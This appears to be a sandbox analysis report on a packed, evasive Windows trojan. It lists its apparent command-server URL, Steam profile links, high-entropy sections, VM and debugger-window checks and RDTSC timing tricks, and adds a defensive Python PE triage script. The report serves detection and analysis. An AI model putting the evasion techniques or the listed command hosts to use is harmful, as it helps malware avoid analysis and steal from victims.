    Source: file.exe, 00000000.00000003.2078215009.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/p;
    Source: file.exe, 00000000.00000002.2266194355.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000002.2266194355.00000000011E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.2266194355.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900$
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000002.2266194355.00000000011D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-X
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49706 version: TLS 1.2

    System Summary

Source: file.exe :: Static PE information: section name: (blank or non-printable)
Source: file.exe :: Static PE information: section name: .rsrc
Source: file.exe :: Static PE information: section name: .idata
Source: file.exe :: Static PE information: section name: (blank or non-printable)
Source: C:\Users\user\Desktop\file.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 1896
Source: file.exe :: Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe :: Static PE information: Section: (blank or non-printable) ZLIB complexity 0.9995616749174917
Source: file.exe :: Static PE information: Section: xuggjiye ZLIB complexity 0.9939983686308221
Source: classification engine :: Classification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Windows\SysWOW64\WerFault.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7140
Source: C:\Windows\SysWOW64\WerFault.exe :: File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3237ed40-a961-483f-8d9d-82984247d3a3
Source: C:\Users\user\Desktop\file.exe :: Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe :: String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe :: File read: C:\Users\user\Desktop\file.exe
Source: unknown :: Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe :: Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 1896
Source: C:\Users\user\Desktop\file.exe :: Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: ondemandconnroutehelper.dll (loaded six times in succession)
Source: C:\Users\user\Desktop\file.exe :: Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe :: Section loaded: ondemandconnroutehelper.dll
Source: file.exe :: Static file information: File size 1808384 > 1048576
Source: file.exe :: Static PE information: Raw size of xuggjiye is bigger than: 0x100000 < 0x18fe00

    Data Obfuscation

Source: C:\Users\user\Desktop\file.exe :: Unpacked PE file: 0.2.file.exe.780000.0.unpack, section rights in memory: (blank):EW; .rsrc:W; .idata:W; (blank):EW; xuggjiye:EW; eirrygcb:EW; .taggant:EW vs. on disk: (blank):ER; .rsrc:W; .idata:W; (blank):EW; xuggjiye:EW; eirrygcb:EW; .taggant:EW (the first blank-named section is execute/read on disk but execute/write once running, i.e. it is rewritten in memory)
Source: initial sample :: Static PE information: section where entry point is pointing to: .taggant
Source: file.exe :: Static PE information: real checksum: 0x1c01ae should be: 0x1c81cc
Source: file.exe :: Static PE information: section name: (blank or non-printable)
Source: file.exe :: Static PE information: section name: .rsrc
Source: file.exe :: Static PE information: section name: .idata
Source: file.exe :: Static PE information: section name: (blank or non-printable)
Source: file.exe :: Static PE information: section name: xuggjiye
Source: file.exe :: Static PE information: section name: eirrygcb
Source: file.exe :: Static PE information: section name: .taggant
Source: file.exe :: Static PE information: section name: (blank or non-printable) entropy: 7.986794328834298
Source: file.exe :: Static PE information: section name: xuggjiye entropy: 7.95408344029227
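The static findings above (blank and randomly named sections, the entry point inside .taggant, a header checksum that does not match the file, and section entropies close to 8 bits per byte) can be reproduced with a short header parser. The following is an added example written for this page, not code from Joe Sandbox or from the sample: it builds a constructed PE32 image with the same section layout as the report (section contents are filler, and the build_pe, parse_pe and triage helpers are mine), then runs the checks. The entropy threshold (above 7.0 over at least 512 bytes) and the treatment of a zero CheckSum as "not set" are assumptions.

```python
import math
import struct

# PE/COFF layout: AddressOfEntryPoint at +16 and CheckSum at +64 of the optional
# header (PE32 and PE32+ alike); COFF header 20 bytes, section headers 40 bytes.
E_LFANEW_OFF, COFF_SIZE, OPT_PE32_SIZE, SECT_HDR_SIZE = 0x3C, 20, 224, 40
SCN_CODE, SCN_IDATA, SCN_EXEC, SCN_READ, SCN_WRITE = 0x20, 0x40, 0x20000000, 0x40000000, 0x80000000
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".idata", ".reloc", ".bss", ".tls", ".pdata"}

def shannon_entropy(data):
    """Bits per byte; values near 8.0 indicate packed or encrypted content."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)

def pe_checksum(data, checksum_off):
    """imagehlp CheckSumMappedFile arithmetic: one's-complement sum of the file as
    32-bit words (CheckSum field skipped), folded to 16 bits, plus the file length."""
    padded, total = data + b"\0" * (-len(data) % 4), 0
    for off in range(0, len(padded), 4):
        if off != checksum_off:
            total += struct.unpack_from("<I", padded, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)

def parse_pe(data):
    """Minimal header parser: entry RVA, CheckSum field and the section table."""
    e_lfanew = struct.unpack_from("<I", data, E_LFANEW_OFF)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff, opt = e_lfanew + 4, e_lfanew + 4 + COFF_SIZE
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    pe = {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0], "checksum_off": opt + 64,
          "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0], "sections": []}
    for i in range(nsections):
        h = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + i * SECT_HDR_SIZE)
        pe["sections"].append({"name": h[0].rstrip(b"\0").decode("latin-1"), "vsize": h[1],
                               "vaddr": h[2], "rawsize": h[3], "chars": h[9],
                               "entropy": shannon_entropy(data[h[4]:h[4] + h[3]])})
    return pe

def triage(data):
    """Static checks mirroring the report's Data Obfuscation findings."""
    pe, findings = parse_pe(data), []
    ep = pe["entry_rva"]
    ep_section = next((s["name"] for s in pe["sections"]
                       if s["vaddr"] <= ep < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    if ep_section not in STANDARD_NAMES:
        findings.append(f"entry point 0x{ep:X} lies in non-standard section {ep_section!r}")
    for s in pe["sections"]:
        if s["name"] not in STANDARD_NAMES:
            findings.append(f"non-standard section name {s['name']!r}")
        if s["rawsize"] >= 512 and s["entropy"] > 7.0:   # thresholds are assumptions
            findings.append(f"section {s['name']!r} entropy {s['entropy']:.2f} (packed data)")
        if s["chars"] & SCN_EXEC and s["chars"] & SCN_WRITE:
            findings.append(f"section {s['name']!r} is writable and executable")
    computed = pe_checksum(data, pe["checksum_off"])
    if pe["stored_checksum"] and pe["stored_checksum"] != computed:  # 0 means "not set"
        findings.append(f"checksum mismatch: header 0x{pe['stored_checksum']:X}, real 0x{computed:X}")
    return {"entry_section": ep_section, "computed_checksum": computed, "findings": findings}

def build_pe(sections, entry, stored_checksum=0, align=0x200):
    """Constructed PE32 image for the demo (not the analysed sample).
    sections: [(name, content, characteristics)]; entry: (section index, offset)."""
    e_lfanew = 0x40
    hdr_len = e_lfanew + 4 + COFF_SIZE + OPT_PE32_SIZE + len(sections) * SECT_HDR_SIZE
    hdr_len = -(-hdr_len // align) * align
    vaddrs, raw_ptr, vaddr, sect_hdrs, body = [], hdr_len, 0x1000, b"", b""
    for name, content, chars in sections:
        rawsize = -(-len(content) // align) * align
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name.encode(), len(content), vaddr,
                                 rawsize, raw_ptr, 0, 0, 0, 0, chars)
        body += content.ljust(rawsize, b"\0")
        vaddrs.append(vaddr)
        raw_ptr, vaddr = raw_ptr + rawsize, vaddr + -(-max(len(content), 1) // 0x1000) * 0x1000
    dos = bytearray(b"MZ".ljust(e_lfanew, b"\0"))
    struct.pack_into("<I", dos, E_LFANEW_OFF, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, OPT_PE32_SIZE, 0x0102)
    opt = bytearray(OPT_PE32_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 16, vaddrs[entry[0]] + entry[1])
    struct.pack_into("<I", opt, 64, stored_checksum)
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect_hdrs).ljust(hdr_len, b"\0") + body

# Layout modelled on the report: blank-named and randomly named high-entropy
# sections, .rsrc/.idata, entry point inside .taggant. Contents are filler;
# bytes(range(256)) repeated has an entropy of exactly 8.0.
PACKED = bytes(range(256)) * 8
RWX = SCN_CODE | SCN_EXEC | SCN_READ | SCN_WRITE
SAMPLE_LAYOUT = [("", PACKED, RWX), (".rsrc", b"\0" * 512, SCN_IDATA | SCN_READ),
                 (".idata", b"\0" * 512, SCN_IDATA | SCN_READ | SCN_WRITE),
                 ("xuggjiye", PACKED, RWX), (".taggant", b"\x60\x9c" + b"\0" * 30, RWX)]

def demo():
    """Header CheckSum set to the report's 0x1C01AE, impossible for a 6 KB file,
    so the mismatch finding fires alongside the section findings."""
    return triage(build_pe(SAMPLE_LAYOUT, entry=(4, 0), stored_checksum=0x1C01AE))
```

Running demo() lists the same four classes of finding the report shows; rebuilding the image with stored_checksum set to the value triage() computes makes the checksum finding disappear, which is the quick way to confirm that a real sample's header was edited after linking rather than simply left at zero.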

    Boot Survival

Source: C:\Users\user\Desktop\file.exe :: Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe :: Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe :: Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe :: Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe :: Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe :: Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe :: Process information set: NOOPENFILEERRORBOX
(the two WerFault.exe entries above recur throughout the run: 5 x FAILCRITICALERRORS | NOGPFAULTERRORBOX and 50 x NOOPENFILEERRORBOX in total)

    Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe :: File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe :: File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 94AA0C second address: 94AA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 94AA12 second address: 94AA32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDDACF47FE8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 95111B second address: 95113E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 js 00007FDDACAD5286h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDDACAD5290h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 95113E second address: 951151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDDACF47FDBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9513D9 second address: 9513DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9516A8 second address: 9516AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9516AD second address: 9516DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD528Dh 0x00000007 pushad 0x00000008 jmp 00007FDDACAD5295h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 951846 second address: 95184C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 95184C second address: 951850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 951850 second address: 95187C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDDh 0x00000007 js 00007FDDACF47FD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FDDACF47FE5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 95187C second address: 951888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FDDACAD5286h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 95404C second address: 954052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 954052 second address: 954056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 954209 second address: 954212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9736F1 second address: 9736F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9736F5 second address: 973710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDDACF47FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jnl 00007FDDACF47FD6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 973710 second address: 973723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD528Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9716BE second address: 9716C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9716C4 second address: 9716CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9716CA second address: 9716CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9716CE second address: 9716D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9716D4 second address: 9716DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9716DD second address: 9716EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD528Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 97180D second address: 971811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
